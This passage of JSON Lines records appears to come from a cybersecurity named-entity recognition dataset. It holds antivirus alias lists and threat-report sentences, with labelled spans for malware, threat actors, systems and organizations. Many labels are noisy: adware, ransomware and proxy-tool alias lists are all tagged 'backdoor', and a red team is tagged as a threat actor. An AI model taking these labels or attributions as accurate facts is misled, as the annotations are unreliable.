Trojan.FakeMS.ED Win32.Trojan.ImPatch.a Trojan.KillAV Win32/Gosht.AY Trojan.Win32.PcClient.zvjt Trojan.Win32.AntiAV.105984.B TrojWare.Win32.Magania.~AAD BehavesLike.Win32.Backdoor.ch Trojan/AntiAV.acg Trojan/Win32.AntiAV Trojan:Win32/Scelp.A Trojan/Win32.OnlineGameHack.R1939 Trojan.AntiAV Trj/Redbind.C Backdoor.Win32.Gh0st.g Trojan.AntiAV!x/J77uxYhp4 Backdoor.Win32.FirstInj W32/Farfli.DZ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004335", "source": "cyner2_train"}} {"text": "Linux.MulDrop.14 changes the password on the devices it infects, unpacks and launches a miner, and then, in an infinite loop, starts searching for network nodes with an open port 22.", "spans": {"SYSTEM: devices": [[45, 52]], "MALWARE: miner,": [[88, 94]], "SYSTEM: network nodes": [[147, 160]]}, "info": {"id": "cyner2_train_004336", "source": "cyner2_train"}} {"text": "Based on the type of targets, on Gaza being the source of the attacks, and on the 
type of information the attackers are after - we estimate with medium-high certainty that the Hamas terrorist organization is behind these attacks.", "spans": {"THREAT_ACTOR: attackers": [[106, 115]], "THREAT_ACTOR: the Hamas terrorist organization": [[172, 204]]}, "info": {"id": "cyner2_train_004337", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAdware.C713 Adware.KraddareCRTD.Win32.3559 W32/Adware.AKQI HT_KRADDARE_FB150035.UVPM Win.Trojan.Kraddare-257 not-a-virus:Downloader.Win32.Snojan.dvv Trojan.Win32.Dwn.cwejxs Trojan.DownLoader21.62200 HT_KRADDARE_FB150035.UVPM W32/Adware.VBKZ-4259 Variant.Strictor.ij TrojanDownloader:Win32/Kraddare.D Trojan.Strictor.D13BAE not-a-virus:Downloader.Win32.Snojan.dvv Win32.Application.RaonMedia.A Downloader.Snojan Adware.Kraddare!CDLXoCIKpSY Trojan-Downloader.Win32.Kraddare", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004338", "source": "cyner2_train"}} {"text": "MITRE ATT & CK techniques Tactic ID Name Description Initial Access T1475 Deliver Malicious App via Authorized App Store The malware impersonates legitimate services on Google Play Persistence T1402 App Auto-Start at Device Boot An Android application can listen for the BOOT_COMPLETED broadcast , ensuring that the app 's functionality will be activated every time the device starts Impact T1472 Generate Fraudulent Advertising Revenue Generates revenue by automatically displaying ads The Rotexy mobile Trojan – banker and ransomware 22 NOV 2018 On the back of a surge in Trojan activity , we decided to carry out an in-depth analysis and track the evolution of some other popular malware families besides Asacub .", "spans": {"ORGANIZATION: MITRE": [[0, 5]], "SYSTEM: Google Play": [[169, 180]], "MALWARE: Rotexy": [[491, 497]], "MALWARE: Asacub": [[708, 714]]}, "info": {"id": "cyner2_train_004340", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Sanhotan Trojan/IRCBot.bh 
Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Tnega.CTXcdP TROJ_SANHOTAN.SMCC Trojan.Win32.Dwn.cwxrbq TrojWare.MSIL.IRCBot.bh Trojan.DownLoader10.23149 TROJ_SANHOTAN.SMCC Trojan.Msil BDS/MSIL.Sanhotan.A.3 Backdoor:MSIL/Sanhotan.A Trojan.Kazy.D3D12A Trojan/Win32.Strictor.C202516 Trojan.Badur Backdoor.MSIL!V0iyslQUBdw MSIL/IRCBot.AR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004343", "source": "cyner2_train"}} {"text": "Around 2014, a specific user group of BlackEnergy attackers came to our attention when they began deploying SCADA-related plugins to victims in the ICS and energy sectors around the world.", "spans": {"THREAT_ACTOR: user group": [[24, 34]], "THREAT_ACTOR: BlackEnergy attackers": [[38, 59]], "ORGANIZATION: the ICS": [[144, 151]], "ORGANIZATION: energy sectors": [[156, 170]]}, "info": {"id": "cyner2_train_004344", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.PcClient!O Win32.Trojan.WisdomEyes.16070401.9500.9999 Hacktool.Rootkit Win.Trojan.PcClient-22 Backdoor.Win32.PcClient.qz Troj.W32.Pakes.l3y1 Backdoor.Win32.PcClient.~AB BackDoor.PcClient BackDoor-CKB.sys Backdoor.Win32.PcClient Backdoor/PcShare.uu BDS/Pcclient.hp.1.C Backdoor.Win32.PcClient.qz Trojan/Win32.PcClient.R32879 BackDoor-CKB.sys", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004345", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PSW.Win32.Gip.112 Trojan.PWS.Gip.EJ GIP.Trojan Gip.1_12 Win32.PSW.Gip.112 TrojWare.Win32.PSW.Gip.112 Trojan.PWS.Gip.112 TR/PWStealer.Srv TROJ_GIP.112 Heuristic.BehavesLike.Win32.Downloader.A Win32/PSW.Gip.112 Trojan/PSW.Gip.112 Trojan-PWS.Win32.Gip!IK Backdoor.Win32.GIP.45568 Win-Trojan/Gip.45990 Trojan.PSW.Gip.1_12 Trojan.PWS.Gip.EJ Trojan.PSW.Gip.112 Trojan-PWS.Win32.Gip W32/GIP.112!tr Gip.1_12", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004347", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
Trojan.Mezzia.CV Trojan.Mezzia TrojanDropper:Win32/Pakks.A Trojan.Mezzia.CV Worm.Mail.Win32.Zhelatin.hd Dropper.Small.29.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004348", "source": "cyner2_train"}} {"text": "TrendMicro has recently discovered a Trojan Android ad library called Xavier Detected by Trend Micro as ANDROIDOS_XAVIER.AXM that steals and leaks a user's information silently.", "spans": {"ORGANIZATION: TrendMicro": [[0, 10]], "MALWARE: Trojan Android": [[37, 51]], "MALWARE: Xavier": [[70, 76]], "ORGANIZATION: Trend Micro": [[89, 100]]}, "info": {"id": "cyner2_train_004349", "source": "cyner2_train"}} {"text": "Recently, we observed a new version of the Clayslide delivery document used to install a new custom Trojan whose developer calls it ALMA Communicator", "spans": {"MALWARE: custom Trojan": [[93, 106]], "MALWARE: ALMA Communicator": [[132, 149]]}, "info": {"id": "cyner2_train_004351", "source": "cyner2_train"}} {"text": "BernhardPOS is named after presumably it's author who left in the build path of C:\\bernhard\\Debug\\bernhard.pdb and also uses the name Bernhard in creating the mutex OPSEC_BERNHARD", "spans": {"MALWARE: BernhardPOS": [[0, 11]], "THREAT_ACTOR: author": [[43, 49]], "MALWARE: Bernhard": [[134, 142]]}, "info": {"id": "cyner2_train_004353", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Autorun.worm.f Worm.VB.Win32.714 Trojan.Heur.9nKfrjYfrwgib W32/Worm.LUOA-4933 W32.SillyFDC Trojan.Win32.Coba.czqfat Worm.Win32.VB.110592 Win32.Trojan.Fakedoc.Auto BehavesLike.Win32.Trojan.tz Worm.Win32.VB W32/Worm.APSB Worm:Win32/Fakeon.A!bit HEUR/Fakon.mwf W32/ExeFolder.E.worm Worm.VB!Ly8UmpRsepM Win32/RootKit.Rootkit.7e5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004357", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur.AutoIT.7 Win.Trojan.Autoit-271 TR/Spy.438784.57", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_004358", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom/W32.GandCrypt.229376.B Trojan.Gandcrypt Troj.Ransom.W32!c Ransom_GandCrypt.R002C0WB618 Win32.Trojan.WisdomEyes.16070401.9500.9998 Ransom_HPGANDCRAB.SMONT Trojan-Ransom.Win32.GandCrypt.bw Trojan.Win32.Kryptik.exorqv TrojWare.Win32.Ransom.GandCrypt.A BehavesLike.Win32.Trojan.dc Trojan/Win32.Magniber.C2395866 Trojan-Ransom.Win32.GandCrypt.bw W32/Injector.DVHR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004359", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Multi Spyware.PasswordStealer Backdoor.Androm.Win32.48978 Uds.Dangerousobject.Multi!c Win32.Trojan.WisdomEyes.16070401.9500.9547 Backdoor.Win32.Androm.oxvy Trojan.Win32.Androm.exigvu Trojan.PWS.Banker1.24888 BehavesLike.Win32.Fareit.ft Trojan.Win32.Injector TR/Dropper.VB.hvcaz Trojan[Backdoor]/Win32.Androm Backdoor.Win32.Androm.oxvy Trojan/Win32.VBKrypt.R218732 Backdoor.Androm Trj/GdSda.A Win32.Backdoor.Androm.Wvaq W32/FareitVB.DVIL!tr Win32/Trojan.5a2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004360", "source": "cyner2_train"}} {"text": "This rootkit family called Umbreon sharing the same name as the Pokémon targets Linux systems, including systems running both Intel and ARM processors, expanding the scope of this threat to include embedded devices as well.", "spans": {"MALWARE: rootkit family": [[5, 19]], "MALWARE: Umbreon": [[27, 34]], "SYSTEM: Linux systems,": [[80, 94]], "SYSTEM: systems": [[105, 112]], "SYSTEM: Intel": [[126, 131]], "SYSTEM: ARM processors,": [[136, 151]], "MALWARE: threat": [[180, 186]], "SYSTEM: embedded devices": [[198, 214]]}, "info": {"id": "cyner2_train_004361", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Delf!O Backdoor.Ginwui Win32.Trojan-Dropper.Delf.bc W32/Trojan2.JUQE PE_GINWUI.AP Win.Downloader.80081-1 Trojan-Downloader.Win32.Delf.ccc Trojan.Win32.Delf.uhoo 
Troj.Dropper.W32.Delf.li4k Win32.Trojan-downloader.Delf.Taex Trojan.DownLoad3.11310 Downloader.Delf.Win32.28823 PE_GINWUI.AP BehavesLike.Win32.Kespo.fc W32/Trojan.ZLPI-8330 TrojanDownloader.Delf.fdg TR/Ghimpe.dll Trojan[Downloader]/Win32.Delf Trojan.Graftor.D7EE4 Trojan.Win32.Downloader.54960 Trojan-Downloader.Win32.Delf.ccc Backdoor:Win32/Ginwui.D Trojan/Win32.Xema.R106631 Win32/TrojanDropper.Delf.OCT Trojan.DL.Delf!lmsXQwcGhNs Trojan-Dropper.Win32.Interlac TrojanDownloader.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004363", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Tiltee TrojanDownloader:Win32/Tiltee.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004364", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Superboy Trojan.Vir.HLL Virus.Supeboy.Win32.1 Trojan.Heur.E3C718 TROJ_SUPEBOY.A W32/Superboy.MNPI-1152 TROJ_SUPEBOY.A Win.Trojan.Supeboy-1 Virus.Win32.HLLW.Supeboy Virus.Win32.HLLW.ghqc Trojan.Win32.Downloader.11776.D W32.HLLW.Supeboy!c Win32.HLLW.Supeboy.A W32/Supeboy.worm Trojan/SuperBoy.DelRegBackup W32/HLLW.Supeboy.A Virus/Win32.Supeboy Virus.Win32.HLLW.Supeboy W32/Supeboy.worm Trojan.Worm Win32/HLLW.Supeboy.A Win32.Virus.Hllw.Akeq Win32.HLLW.Supeboy.B Virus.Win32.HLLW Win32/Virus.BO.621", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004365", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.AppdataAdobLnrC.Trojan Net-Worm.Win32.Cynic!O Worm.Cynic Worm.Cynic.Win32.96 Win32.Trojan.WisdomEyes.16070401.9500.9997 Net-Worm.Win32.Cynic.iu Trojan.Win32.Bot.crrkzb BackDoor.IRC.Bot.1244 BehavesLike.Win32.Downloader.ct TR/Zbot.var Worm[Net]/Win32.Cynic Worm:Win32/Vexral.A Trojan.Barys.657 Worm.Win32.A.Net-Cynic.95744 Net-Worm.Win32.Cynic.iu Trojan/Win32.IRCBot.R23264 Worm.Cynic Win32/AutoRun.IRCBot.II Trojan.Injector!y7pxtOpaO3Y Net-Worm.Win32.Cynic W32/Injector.HXK!tr", "spans": {"MALWARE: 
backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004368", "source": "cyner2_train"}} {"text": "Like several of the newer variants of ransomware, it does not require an internet connection to encrypt the files.", "spans": {}, "info": {"id": "cyner2_train_004369", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Spy/W32.QQLogger.236036.B TrojanPWS.QQthief.BI4 Trojan/Spy.QQLogger.aby Trojan.Win32.QQLogger.bdqigk Phisher.CZ Trojan.Spy-85326 Trojan-Spy.Win32.QQLogger.ado TrojanSpy.QQLogger!0FayLe3uYlk Trojan.PWS.Qqpass.6867 TrojanSpy.QQLogger.ct Win32.Troj.QQLogger.kcloud PWS:Win32/QQThief.I Spyware/Win32.QQLogger Virus.Win32.Part.a TrojanSpy.QQLogger Trojan.PSW.Win32.QQThief.j Trojan-Spy.Win32.QQLogger W32/QQLogger.CDX!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004371", "source": "cyner2_train"}} {"text": "A backdoor also known as: Dropped:Backdoor.BlueFire.0.5.0 Backdoor/W32.BlueFire.593408 Backdoor.Bluefire Backdoor/BlueFire.036 BKDR_BLUEFIRE.A W32/Risk.VCME-1818 Construction.Kit BKDR_BLUEFIRE.A Win.Trojan.Bluefire-5 Backdoor.Win32.BlueFire.036 Dropped:Backdoor.BlueFire.0.5.0 Trojan.Win32.BlueFire.gaiw Backdoor.W32.BlueFire.036!c Dropped:Backdoor.BlueFire.0.5.0 Backdoor.Win32.BlueFire.036 Dropped:Backdoor.BlueFire.0.5.0 BackDoor.BlueFire.36 Backdoor.BlueFire.Win32.12 Backdoor/BlueFire.036 W32.Trojan.Backdoor-BlueFire BDS/BlueFire.50.DLL Trojan[Backdoor]/Win32.BlueFire Backdoor.BlueFire.0.5.0 Backdoor.Win32.BlueFire.036 Backdoor:Win32/BlueFire.0_36 Trojan/Win32.BlueFire.R61616 Dropped:Backdoor.BlueFire.0.5.0 Backdoor.BlueFire Win32/BlueFire.036 Win32.Backdoor.Bluefire.Tayj Backdoor.BlueFire!vtgAlnbXp+8 Backdoor.Win32.Way W32/Bdoor.UZ!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004372", "source": "cyner2_train"}} {"text": "However, the attack is different in two respects: unlike other APTs, the main focus of Blue Termite is to attack Japanese organizations; and most of their 
C2s are located in Japan.", "spans": {"THREAT_ACTOR: APTs,": [[63, 68]], "THREAT_ACTOR: Blue Termite": [[87, 99]], "ORGANIZATION: Japanese organizations;": [[113, 136]], "SYSTEM: C2s": [[155, 158]]}, "info": {"id": "cyner2_train_004375", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Crypt.ED Dropper.Binder.Win32.1016 Trojan/Dropper.Binder.qd Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/DropperX.VWP Trojan.Crypt.ED Backdoor.Win32.Rbot.abwp Trojan.Crypt.ED Trojan.Crypt.ED BackDoor.Shell BehavesLike.Win32.Backdoor.bh W32/Risk.ZNPN-3988 TrojanDropper.Binder.ht Trojan.Crypt.ED Backdoor.Win32.Rbot.abwp Backdoor:Win32/Blackhole.U Backdoor/Win32.Hupigon.R7788 Trojan.Crypt.ED Backdoor.Shell", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004377", "source": "cyner2_train"}} {"text": "A subsequent investigation revealed that the spyware has the following capabilities : Records every phone call ( literally the conversation as a media file ) , then sends it together with the caller id to the C & C ( incall3.php and outcall3.php ) Logs every incoming SMS message ( SMS body and SMS sender ) to C & C ( script3.php ) Has capability to hide self Can send all call logs ( “ content : //call_log/calls ” , info : callname , callnum , calldate , calltype , callduration ) to C & C ( calllog.php ) Whenever the user snaps a picture , either with the front or rear camera , it gets sent to the C & C ( uppc.php , fi npic.php orreqpic.php ) Can send GPS coordinates to C & C ( gps3.php ) The C & C server to which the application seems to be sending collected data appears to be operational , as of this writing , and running since May 2018 .", "spans": {"SYSTEM: GPS": [[659, 662]]}, "info": {"id": "cyner2_train_004379", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Trojan.Crypt.52 TSPY_EMOTET.SMD3 Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_EMOTET.SMD3 Trojan.Win32.Diple.euwotz TrojWare.Win32.Crypt.AX 
BehavesLike.Win32.Ramnit.dc W32.Trojan.Emotet Trojan:Win32/Diple.B!bit Trojan/Win32.Magniber.R212688 Trojan.Win32.VB Win32/Trojan.d4d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004380", "source": "cyner2_train"}} {"text": "Windows and winzip do not natively extract them which delivers some malware.", "spans": {"SYSTEM: Windows": [[0, 7]], "SYSTEM: winzip": [[12, 18]], "MALWARE: malware.": [[68, 76]]}, "info": {"id": "cyner2_train_004382", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Halk!O Backdoor.CIA BKDR_NERTE.780 Backdoor.Win32.NerTe.780 Backdoor.Win32.Nerte_780.Inst[h] Backdoor.Win32.NerTe.780 Trojan.MulDrop.1253 BKDR_NERTE.780 W32/Risk.YHOK-6554 BDS/Nerte78.Inst Win32.Hack.NerteZip.kcloud Backdoor:Win32/Nerte.7_80.dr Bck/Iroffer.BG Win32/NerTe.78.Client W32/NerTe.V780!tr.bdr BackDoor.Nerte Backdoor.Win32.NerTe.ajn", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004383", "source": "cyner2_train"}} {"text": "These campaigns have lead to a rapid rise in the rate of Bedep infections, with Arbour Networks observing just above 80K infections over a 3-day period.", "spans": {"THREAT_ACTOR: These campaigns": [[0, 15]], "MALWARE: Bedep": [[57, 62]], "SYSTEM: Arbour Networks": [[80, 95]]}, "info": {"id": "cyner2_train_004384", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.TrojanSpy.Banker.ahy.f W32/Packed_Upack.H Trojan-Banker.Win32.Banker.etk Packed.Win32.UPack Trojan.PWS.Banker.based Trojan-Banker.Win32.Banbra!IK Trojan-Banker.Win32.Banbra PSW.Banker Trj/Banker.ITS", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004385", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HostsMsasc.Trojan Trojan.Win32.Inject!O Trojan.Zusy.D7CC Win32.Trojan.WisdomEyes.16070401.9500.9998 TROJ_PAM_000002012C.T3 Win.Trojan.Inject-7728 Trojan.Win32.Inject.dcduro Trojan.Win32.A.Llac.419328 Trojan.MulDrop3.3872 
Trojan.Injector.Win32.50089 Trojan-Spy.MSIL TrojanDropper.Injector.kgt TR/Jorik.AC Trojan/Win32.Shakblades TrojanSpy:MSIL/VB.M Trojan/Win32.Jorik.C97808 Worm.Shakblades Worm.Ainslot!/rTzgf3sAsw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004386", "source": "cyner2_train"}} {"text": "On July 16, 2015, the Palo Alto Networks Unit 42 threat intelligence team discovered a watering hole attack on the website of a well-known aerospace firm.", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42 threat intelligence team": [[22, 73]], "ORGANIZATION: aerospace firm.": [[139, 154]]}, "info": {"id": "cyner2_train_004388", "source": "cyner2_train"}} {"text": "MalumPoS was designed to be configurable.", "spans": {"MALWARE: MalumPoS": [[0, 8]]}, "info": {"id": "cyner2_train_004389", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virtool.8944 Server-Proxy.Win32.CCProxy!O W32/HackTool.CYA not-a-virus:Server-Proxy.Win32.CCProxy.63 Virtool.8944 Riskware.Win32.CCProxy.ybka Virtool.8944 Win32.ServerProxy.CCProxy.~BAAB Program.CCProxy W32/Tool.YSPN-2643 AdWare/CCProxy.b GrayWare[Server-Proxy]/Win32.CCProxy HackTool:Win32/CCProxy.B Virtool.D22F0 not-a-virus:Server-Proxy.Win32.CCProxy.63 Virtool.8944 Win-AppCare/Ccproxy.987136 Virtool.8944 not-a-virus:Server-Proxy.Win32.CCProxy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004390", "source": "cyner2_train"}} {"text": "The source and destination addresses are both blank without an actual email address.", "spans": {}, "info": {"id": "cyner2_train_004391", "source": "cyner2_train"}} {"text": "Unit 42 also tracks the APT3 group using the name UPS, which is an intrusion set with Chinese origins that is known for having early access to zero-day vulnerabilities and delivering a backdoor called Pirpi.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: APT3 group": [[24, 34]], "THREAT_ACTOR: UPS,": [[50, 54]], "VULNERABILITY: zero-day vulnerabilities": [[143, 
167]], "MALWARE: backdoor": [[185, 193]], "MALWARE: Pirpi.": [[201, 207]]}, "info": {"id": "cyner2_train_004394", "source": "cyner2_train"}} {"text": "Most security vendors fail to identify the malicious code 7/55 on virustotal", "spans": {"ORGANIZATION: security vendors": [[5, 21]], "MALWARE: malicious code": [[43, 57]], "ORGANIZATION: virustotal": [[66, 76]]}, "info": {"id": "cyner2_train_004395", "source": "cyner2_train"}} {"text": "VBS malware, likely deployed as part of a red team", "spans": {"MALWARE: VBS malware,": [[0, 12]], "THREAT_ACTOR: a red team": [[40, 50]]}, "info": {"id": "cyner2_train_004396", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGamesMSIMOB.Trojan Worm.Win32.FakeFolder!O Trojan.Fakefolder.C4 Worm.FakeFolder.Win32.23 W32/FakeFolder.ADPV-1915 W32.SillyFDC Win32/SillyAutorun.FIA TSPY_FAKEALERT_BH010146.TOMC Win.Trojan.Fakefolder-76 Worm.Win32.FakeFolder.a Worm.Win32.A.FakeFolder.26624[UPX] TSPY_FAKEALERT_BH010146.TOMC BehavesLike.Win32.PWSBanker.tc Trojan.Win32.Fakefolder W32/FakeFolder.A Worm/FakeFolder.b Worm/Win32.FakeFolder Trojan:Win32/Fakefolder.C Worm.Win32.FakeFolder.a Trojan/Win32.FakeFolder.R143433 Worm.FakeFolder Win32.Worm.Fakefolder.Wmim Worm.FakeFolder!qDF5E1Kz9pU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004398", "source": "cyner2_train"}} {"text": "Similar to previous attacks, the Disttrack malware used by Shamoon is just the destructive payload.", "spans": {"MALWARE: Disttrack malware": [[33, 50]], "THREAT_ACTOR: Shamoon": [[59, 66]], "MALWARE: the destructive payload.": [[75, 99]]}, "info": {"id": "cyner2_train_004399", "source": "cyner2_train"}} {"text": "A backdoor also known as: TjnClicker.Qaccel.S1448 Trojan.Small.Win32.31852 Trojan/Clicker.Small.ndn Trojan.Win32.Click3.erajhs TrojWare.Win32.TrojanClicker.Small.DS Trojan.Click3.21941 TR/Dropper.tstkm GrayWare[AdWare]/Win32.TrojanClicker.Small.ndn Trojan/Win32.Dynamer.R187373 Backdoor.Bot Trojan.Win32.TrojanClicker", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004400", "source": "cyner2_train"}} {"text": "A macOS malware agent, named MacDownloader, was observed in the wild as targeting the defense industrial base, and reported elsewhere to have been used against an human rights advocate.", "spans": {"SYSTEM: macOS": [[2, 7]], "MALWARE: malware agent,": [[8, 22]], "MALWARE: MacDownloader,": [[29, 43]], "ORGANIZATION: defense industrial base,": [[86, 110]], "ORGANIZATION: an human rights advocate.": [[160, 185]]}, "info": {"id": "cyner2_train_004405", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod740.Trojan.4797 Backdoor.Bittaru!1goVteZqWDk TROJ_SPNR.15KL11 MalCrypt.Indus! BDS/Bittaru.A.4 TROJ_SPNR.15KL11 Win32.Troj.Undef.kcloud Backdoor:Win32/Bittaru.A W32/Trojan.PAFV-2148 W32/BackDoor.DPM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004407", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL.Disfa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004408", "source": "cyner2_train"}} {"text": "A backdoor also known as: MemScan:Trojan.Glitch.A Trojan-Dropper.Win32.Juntador!O MemScan:Trojan.Glitch.A Trojan/Dropper.Juntador.c Trojan.Glitch.A W32/Dropper.ATCT Backdoor.IRC.Zcrew TROJ_JUNTADOR.C Win.Dropper.Juntador-12 MemScan:Trojan.Glitch.A Trojan-Dropper.Win32.Delf.hq MemScan:Trojan.Glitch.A Trojan.Win32.Juntador.diov MemScan:Trojan.Glitch.A TrojWare.Win32.TrojanDropper.Juntador.c0 MemScan:Trojan.Glitch.A BackDoor.DMoon Dropper.Juntador.Win32.230 TROJ_JUNTADOR.C BehavesLike.Win32.Dropper.hc W32/Risk.HJDZ-9373 TrojanDropper.Win32.Juntador.c TrojanDropper:Win32/Juntador.C Trojan-Dropper.Win32.Delf.hq Trojan/Win32.LdPinch.C10075 Win32/TrojanDropper.Juntador.C Win32.Trojan-dropper.Delf.Eegz Trojan-Dropper.Win32.Juntador.C Win32/Trojan.bf1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004409", "source": "cyner2_train"}} {"text": 
"A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Script.Application.CdEject.A Script.Application.Cdeject!c BehavesLike.Win32.PUPXBC.dc Joke:VBS/CDEject.D PUP.Linkury/Variant Trojan.Ejectcd.A VBS/CDEject.I Backdoor.MSIL.Bladabindi VBS/CDEject.I!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004411", "source": "cyner2_train"}} {"text": "Symantec has identified a previously unknown group called Sowbug that has been conducting highly targeted cyber attacks against organizations in South America and Southeast Asia and appears to be heavily focused on foreign policy institutions and diplomatic targets.", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: unknown group": [[37, 50]], "THREAT_ACTOR: Sowbug": [[58, 64]], "ORGANIZATION: organizations": [[128, 141]], "ORGANIZATION: foreign policy institutions": [[215, 242]], "ORGANIZATION: diplomatic targets.": [[247, 266]]}, "info": {"id": "cyner2_train_004412", "source": "cyner2_train"}} {"text": "This disabled the attacker's access to their victims in this campaign, provided further insight into the targets currently victimized in this operation, and enabled the notification of affected parties.", "spans": {"THREAT_ACTOR: attacker's": [[18, 28]], "THREAT_ACTOR: campaign,": [[61, 70]], "THREAT_ACTOR: operation,": [[142, 152]]}, "info": {"id": "cyner2_train_004413", "source": "cyner2_train"}} {"text": "Finally, Doctor Web's security researchers investigated the Linux.Mirai Trojan found later that month.", "spans": {"ORGANIZATION: Doctor Web's security researchers": [[9, 42]], "MALWARE: Trojan": [[72, 78]]}, "info": {"id": "cyner2_train_004417", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus.Win32.Sality!O Backdoor.Poison.Win32.26527 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.VBKrypt.hjcg Trojan.Win32.VB.dodqqz Troj.W32.VBKrypt.hjcg!c Trojan.MulDrop2.20812 Backdoor/Poison.eqy Trojan/Win32.VBKrypt TrojanDownloader:Win32/Tyqui.B 
Trojan.Win32.VBKrypt.hjcg Trj/CI.A Win32/TrojanDownloader.VB.ODM Trojan.VBKrypt!ngQI4PCHe4I Backdoor.Poison W32/Dx.TQG!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004418", "source": "cyner2_train"}} {"text": "A backdoor also known as: PERL/Shellbot.B Backdoor.Perl.Shellbot.B Perl/Shellbot.PR Perl.Backdoor.Shellbot.f Unix/ShellBot.AH IRC.Backdoor.Trojan Perl/Shellbot.NAI PERL_SHELBOT.SMO Win.Trojan.Perlbot-1 Backdoor.Perl.IRCBot.ij Backdoor.Perl.Shellbot.B Backdoor.Perl.Ircbot!c Perl.Backdoor.Ircbot.Akpo Backdoor.Perl.Shellbot.B Backdoor.Perl.Shellbot.B Perl.Ircbot.93 PERL_SHELBOT.SMO Unix/ShellBot.AH PERL/Shellbot.aa Perl/IRCBot.I!tr Backdoor.Perl.Shellbot.B Backdoor.Perl.IRCBot.ij Backdoor:Perl/Shellbot.Z Backdoor.Perl.Shellbot.B Perl.Shellbot.I Trojan.Perl.Shellbot Backdoor.Perl.Shellbot.B Win32/Trojan.BO.811", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004420", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9928 W32/Trojan.GELV-4208 Backdoor.MSIL.Bladabindi.akrb Trojan.Win32.Bladabindi.extavb Backdoor.Msil.Bladabindi!c Msil.Backdoor.Bladabindi.Wmjd BackDoor.Bladabindi.13678 Backdoor.Bladabindi.Win32.8723 Trojan.MSIL.Injector Trojan:Win32/Vb.At TR/Crypt.fkm.udrkf Trojan[Backdoor]/MSIL.Bladabindi Trojan.MSIL.Bladabindi.1 Trojan.Win32.Z.Bladabindi.192000.A Backdoor.MSIL.Bladabindi.akrb Trojan:MSIL/Inmalsal.A MSIL/Kryptik.GJY!tr Trj/GdSda.A Win32/Trojan.BO.610", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004422", "source": "cyner2_train"}} {"text": "A backdoor also known as: Constructor.Win32.Houndhack!O Backdoor.Venik.MUE.J2 Trojan/Farfli.bwm 